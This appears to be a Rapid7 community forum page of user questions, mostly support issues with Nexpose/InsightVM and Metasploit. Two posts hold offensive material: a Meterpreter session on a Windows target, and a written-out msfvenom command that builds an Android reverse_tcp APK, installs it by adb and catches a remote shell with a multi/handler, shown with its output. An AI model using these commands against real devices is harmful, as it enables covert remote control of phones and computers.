We are running Nexpose Rapid 7 with end point agents deployed on all assets. All of the assets in my environment are listed as having this vulnerability in the security console. I have checked the version of the endpoint agent on several machines and all are Version: 1.4.69. There are 3 logs within the Rapid7 folder: upgrade, upgrade_error, upgrade_manifest, all dated 10/11/2017. Can someone help me troubleshoot why the assets are showing up with this vulnerability when all seem to have the correct agent version installed. Thank you.
Posted by Kristi Brady about a year ago
I have already get a Meterpreter session, and run command 'sysinfo' on my target, it looks like this : meterpreter > sysinfo Computer : WIN-AL678DJCQIH OS : Windows 2012 R2 (Build 9600). Architecture : x64 System Language : zh_CN Domain : ***** Logged On Users : 16 Meterpreter : x86/windows >>> but when i run other commands , nothing echo back I wonder maybe the payload will run successful in 32 , but it can't run x64 Architecture . Am i right ?
Posted by Johnson Smith about a year ago
I am attempting to automate installation of Nexpose consoles. For engines, I can run the installer like so: ``` ./Rapid7Setup-Linux64.bin \ -q \ '-VconsoleAddress=SOMEADDRESS' \ '-VcommunicationDirectionChoice$Integer=1' \ '-Vfirstname=MY' \ '-Vlastname=NAME' \ '-Vcompany=MYCOMPANY' \ '-Vsys.component.typical$Boolean=false' \ '-Vsys.component.engine$Boolean=true' \ '-VinitService$Boolean=true' \ '-Dinstall4j.suppressUnattendedReboot=true' ``` I would think I can do something similar for the console, replacing component.typical with true, and leaving out the engine line, but I consistently get: ```` Unpacking JRE ... Starting Installer ... GLib-GIO-Message: Using the 'memory' GSettings backend. Your settings will not be saved or shared with other applications. The installation directory has been set to /opt/rapid7/nexpose. Rolling back changes... ```` I am sure I am missing some flags, but I have not been able to find documentation on what they would be.
Posted by Noah Birnel about a year ago
Hi, Does anyone experience a similar problem after migrating to the new AWS Asset Sync discovery connection: The connection is in state Connected, instances are imported into a site, however when choosing to scan a scan the following message is returned: "Scan action failed: The requested scan cannot run at this time. Targets are currently being verified for scanning. Scanning will start if the targets can get verified." I am confused because there is no mentioning of target verification in Nexpose user documentation. Any ideas on how to proceed are appreciated.
Posted by elenako about a year ago
Is the nexpose(insightVM) possible to scan for CVE-2017-13077,CVE-2017-13078,CVE-2017-13079,CVE-2017-13080,CVE-2017-13081,CVE-2017-13082,CVE-2017-13084,CVE-2017-13086,CVE-2017-13087,CVE-2017-13088? https://www.krackattacks.com/
Posted by Yu Iwama about a year ago
Hi. Last week I downloaded and installed Metasploit Pro trial version. I have performed a scan on our PCIDSS network (192.168.25.0/24). When I look at the reports I do not see all of the possible Hosts being checked. Is this a limitation of the trial version ? I also cannot find pricing for it.
Posted by Glenn Chadwick about a year ago
I want to be able to examine how an exploit makes it way through from the Metaspoit system all the way to compromised system but I need to be able to visualize the attack graphically. Once the exploit hits the compromised system can what the exploit does be captured graphically step by step as the exploit reaches the NIC from the wire and then onward.
Posted by Victor M about a year ago
Hello, It seems NexPose Virtual Appliance is not supported in the following environment: VMware ESXi 6.0 and 6.5. Is it already supported but is not documented ? Otherwise, can we expect a new OVF file to be released very soon ? https://kb.help.rapid7.com/v1.0/docs/insightvm-and-nexpose-virtual-appliance-guide Regards, Paulo Rio
Posted by Paulo Rio about a year ago
Is it possible in a report or asset group to somehow display the risk generated by one specific piece of software? Lets say I have an asset group for all machines with Mozilla Firefox installed and I want to see the risk generated by that program on all the machines it is present on at a glance, without having to click into each machine and totaling up the risk scores from any issues related to it. I tried running a report where I selected vulnerability filters and excluded everything but the Mozilla categories, but I still get a report that shows all the vulnerabilities present on all the machines that have Firefox installed.
Posted by Michael Barnocki about a year ago
I created an apk file via msfvenom, root@root:~$ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.54 LPORT=4444 R > met.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8805 bytes intsalled an android phone root@root:~$ adb install met.apk met.apk: 1 file pushed. 2.5 MB/s (8812 bytes in 0.003s) pkg: /data/local/tmp/met.apk Success and opened mainactivity app from android launcher. Then i open msfconsole and run exploit cammand root@root:~$ msfconsole =[ metasploit v4.16.11-dev- ] + -- --=[ 1694 exploits - 968 auxiliary - 299 post ] + -- --=[ 499 payloads - 40 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.43.54 LHOST => 192.168.43.54 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > exploit [*] Exploit running as background job 0. msf exploit(handler) > [*] Started reverse TCP handler on 192.168.43.54:4444 [*] Sending stage (69089 bytes) to 192.168.43.1 [*] Meterpreter session 1 opened (192.168.43.54:4444 -> 192.168.43.1:42939) at 2017-10-12 18:57:59 +0530 this shows only Meterpreter session 1 opened and does not open Meterpreter shell Meterpreter> i used metasploit framework v4.16.11-dev- on ubuntu 17.04 LTS how can i do?
Posted by shamil about a year ago
Hi, I need to move some machines from one scan group to another but retain the scan history of the machines, so I was going to use the “Remove asset from site” option. I have tried this on a small number of machines but when I then scan those machines the Vulnerable Since column has todays date listed, with no dates older than that, which there should be. VMS stated “Historical data will be kept” so shouldn’t it keep the original date of the vulnerabilities? Is there a way to keep those dates? Am I doing the transfer wrongly? Is there another way to do it? Thanks.
Posted by Andrew Edmunds about a year ago